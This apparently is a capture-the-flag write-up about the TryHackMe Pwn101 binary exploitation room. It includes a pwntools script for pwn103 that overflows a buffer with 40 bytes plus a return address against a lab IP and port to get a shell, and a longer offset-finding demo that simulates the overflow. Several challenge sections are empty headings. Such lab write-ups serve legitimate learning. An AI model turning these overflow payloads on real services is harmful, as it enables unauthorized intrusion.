Using Pwntools to Pwn the [Pwn101] Room on TryHackMe
Real quickly, I have to say that I don't have idols. I don't like the idea of idols. But, Hugsy and Fyodor (nmap), they're both idols of mine. I try to look up to them, for inspiration, keeping in mind that I should look at what they were doing, when they were at my experience level, so their skill set doesn't seem impossibly unobtainable.
Beginner-level binary exploitation challenges.
Challenge 1 - pwn101
We're always going to start off by marking these binaries executable and basically running them. I'm not going to run a malware scan, because I'm in a dedicated environment. But, even in this situation, that's dumb of me. You should run a malware scan of any suspicious binary.
Ok... it drops a shell and the challenge is on port 9001... And, yes, some things are just this easy. Haha
Challenge 2 - pwn102
Challenge 3 - pwn103
Weaponize it for the server:

```python
from pwn import *
p = remote("10.10.200.187", 9003)  # room instance IP and the pwn103 port
payload = b"A"*40 + p64(0x00401554) + p64(0x00401554)  # 40 bytes to the saved return address, then the target (repeated as in the original)
p.sendline(payload)
p.interactive()
```
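The 40-byte padding in that payload comes from crashing the binary with a cyclic pattern and looking up which part of it landed in the return address. The following added example is not from the writeup or from pwntools: it reimplements `cyclic()`, `cyclic_find()` and `p64()` with the standard library and runs them against a constructed frame (32-byte buffer, saved RBP, return address; an assumption, not the real pwn103 layout) so the whole offset-finding step runs offline without the binary.

```python
import functools
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"

@functools.lru_cache(maxsize=None)
def de_bruijn(alphabet=ALPHABET, n=4):
    """De Bruijn sequence (FKM construction, as in pwntools): every n-byte window is unique."""
    k, out = len(alphabet), []
    a = [0] * (k * n)
    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)
    db(1, 1)
    return bytes(alphabet[i] for i in out)

def cyclic(length, n=4):           # pwntools cyclic(length)
    return de_bruijn(ALPHABET, n)[:length]

def cyclic_find(window, n=4):      # pwntools cyclic_find(); -1 if absent
    return de_bruijn(ALPHABET, n).find(window[:n])

def p64(value):                    # pwntools p64(): 8 bytes, little-endian
    return struct.pack("<Q", value)

# Constructed stand-in for the crash (an assumption, not the real pwn103 frame):
# 32-byte buffer, 8-byte saved RBP, 8-byte saved return address, so the
# return slot starts 40 bytes into the input.
BUF_SIZE, SAVED_RBP, RET_ADDR = 32, 8, 8

def simulate_overflow(data):       # unchecked copy; returns the return slot
    frame = bytearray(BUF_SIZE + SAVED_RBP + RET_ADDR)
    n = min(len(data), len(frame))
    frame[:n] = data[:n]
    return bytes(frame[BUF_SIZE + SAVED_RBP:])

def find_offset(pattern_len=100):  # crash with a pattern, look up what hit RIP
    clobbered = simulate_overflow(cyclic(pattern_len))
    return cyclic_find(clobbered[:4])  # low 4 bytes, as a debugger shows at the fault

def build_payload(offset, target): # padding, then the target twice as in the writeup
    return b"A" * offset + p64(target) + p64(target)
```

Against the real binary the pattern goes to the process under gdb instead of `simulate_overflow`, and the four bytes fed to `cyclic_find` are read from RSP (or RBP) at the crash.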
Challenge 4 - pwn104 (nop sled)